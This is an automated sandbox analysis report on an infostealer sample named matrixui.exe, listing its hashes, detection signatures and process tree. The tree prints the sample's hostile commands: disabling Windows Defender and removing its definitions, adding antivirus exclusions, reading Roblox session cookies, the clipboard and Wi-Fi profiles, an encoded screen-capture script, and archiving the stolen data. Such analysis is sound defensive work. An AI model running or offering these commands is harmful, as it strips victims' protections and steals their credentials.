Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-12-2024 10:18

General

  • Target

    matrixui.exe

  • Size

    7.6MB

  • MD5

    bc10f1dccff3104c49b44ecd33a83060

  • SHA1

    035b77d91991225c62b91df78d6a81ac0db00ef2

  • SHA256

    306eb9163f6be5ef3d65a11086c4b45e931dcedcef6bb86fa20af66d21204a19

  • SHA512

    362af99f65c3f72df8d7a131e37d848ccf8c48fabe7f434c81481d9b260f736160624a15e3973c1512a9a7edf10b7d438feffa89bcc81e7f834533f95749c0d5

  • SSDEEP

    196608:6YD+kdpzwfI9jUCBB7m+mKOY7rXrZusoSDmhfvsbnTNeWF:R5nAIHL7HmBYXrYSaUNL

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 3 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • UPX packed file 58 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 21 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\matrixui.exe
    "C:\Users\Admin\AppData\Local\Temp\matrixui.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2876
    • C:\Users\Admin\AppData\Local\Temp\matrixui.exe
      "C:\Users\Admin\AppData\Local\Temp\matrixui.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:752
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\matrixui.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3644
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\matrixui.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4828
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:844
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4328
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('restart pc', 0, 'error 508', 0+16);close()""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4436
        • C:\Windows\system32\mshta.exe
          mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('restart pc', 0, 'error 508', 0+16);close()"
          4⤵
            PID:4896
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1276
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:3928
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4796
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic csproduct get uuid
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:432
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3064
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
            4⤵
              PID:1444
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3348
            • C:\Windows\system32\reg.exe
              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              4⤵
                PID:64
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:852
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                4⤵
                • Detects videocard installed
                • Suspicious use of AdjustPrivilegeToken
                PID:3848
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4800
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                4⤵
                • Detects videocard installed
                PID:1568
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\​ ​  .scr'"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2828
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\​ ​  .scr'
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:4192
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1292
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:2304
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4276
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:920
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              3⤵
              • Clipboard Data
              PID:4592
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell Get-Clipboard
                4⤵
                • Clipboard Data
                • Suspicious behavior: EnumeratesProcesses
                PID:2344
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              3⤵
                PID:2336
                • C:\Windows\System32\Wbem\WMIC.exe
                  WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                  4⤵
                    PID:396
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                  3⤵
                    PID:4808
                    • C:\Windows\system32\tasklist.exe
                      tasklist /FO LIST
                      4⤵
                      • Enumerates processes with tasklist
                      PID:840
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    3⤵
                      PID:1816
                      • C:\Windows\system32\tree.com
                        tree /A /F
                        4⤵
                          PID:4328
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                        3⤵
                        • System Network Configuration Discovery: Wi-Fi Discovery
                        PID:4008
                        • C:\Windows\system32\netsh.exe
                          netsh wlan show profile
                          4⤵
                          • Event Triggered Execution: Netsh Helper DLL
                          • System Network Configuration Discovery: Wi-Fi Discovery
                          PID:4964
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "systeminfo"
                        3⤵
                          PID:4612
                          • C:\Windows\system32\systeminfo.exe
                            systeminfo
                            4⤵
                            • Gathers system information
                            PID:1200
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                          3⤵
                            PID:1072
                            • C:\Windows\system32\reg.exe
                              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                              4⤵
                                PID:1988
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                              3⤵
                                PID:2496
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                  4⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:2892
                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vzovoo2o\vzovoo2o.cmdline"
                                    5⤵
                                      PID:4316
                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA066.tmp" "c:\Users\Admin\AppData\Local\Temp\vzovoo2o\CSC156940F976C04C4D8E81A5770BD9ABC.TMP"
                                        6⤵
                                          PID:1908
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                    3⤵
                                      PID:5112
                                      • C:\Windows\system32\tree.com
                                        tree /A /F
                                        4⤵
                                          PID:1908
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                        3⤵
                                          PID:4740
                                          • C:\Windows\system32\attrib.exe
                                            attrib -r C:\Windows\System32\drivers\etc\hosts
                                            4⤵
                                            • Drops file in Drivers directory
                                            • Views/modifies file attributes
                                            PID:4052
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                          3⤵
                                            PID:2388
                                            • C:\Windows\System32\Conhost.exe
                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              4⤵
                                                PID:3848
                                              • C:\Windows\system32\tree.com
                                                tree /A /F
                                                4⤵
                                                  PID:2600
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                                3⤵
                                                  PID:3660
                                                  • C:\Windows\system32\attrib.exe
                                                    attrib +r C:\Windows\System32\drivers\etc\hosts
                                                    4⤵
                                                    • Drops file in Drivers directory
                                                    • Views/modifies file attributes
                                                    PID:5004
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                  3⤵
                                                    PID:4564
                                                    • C:\Windows\system32\tree.com
                                                      tree /A /F
                                                      4⤵
                                                        PID:4080
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                      3⤵
                                                        PID:548
                                                        • C:\Windows\system32\tasklist.exe
                                                          tasklist /FO LIST
                                                          4⤵
                                                          • Enumerates processes with tasklist
                                                          PID:4828
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                        3⤵
                                                          PID:5020
                                                          • C:\Windows\system32\tree.com
                                                            tree /A /F
                                                            4⤵
                                                              PID:3692
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                            3⤵
                                                              PID:5048
                                                              • C:\Windows\system32\tree.com
                                                                tree /A /F
                                                                4⤵
                                                                  PID:2900
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                3⤵
                                                                  PID:220
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                    4⤵
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:2724
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                  3⤵
                                                                    PID:2472
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                      4⤵
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:756
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "getmac"
                                                                    3⤵
                                                                      PID:4328
                                                                      • C:\Windows\system32\getmac.exe
                                                                        getmac
                                                                        4⤵
                                                                          PID:4588
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI28762\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\vnjhk.zip" *"
                                                                        3⤵
                                                                          PID:3516
                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI28762\rar.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\_MEI28762\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\vnjhk.zip" *
                                                                            4⤵
                                                                            • Executes dropped EXE
                                                                            PID:4084
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                          3⤵
                                                                            PID:3308
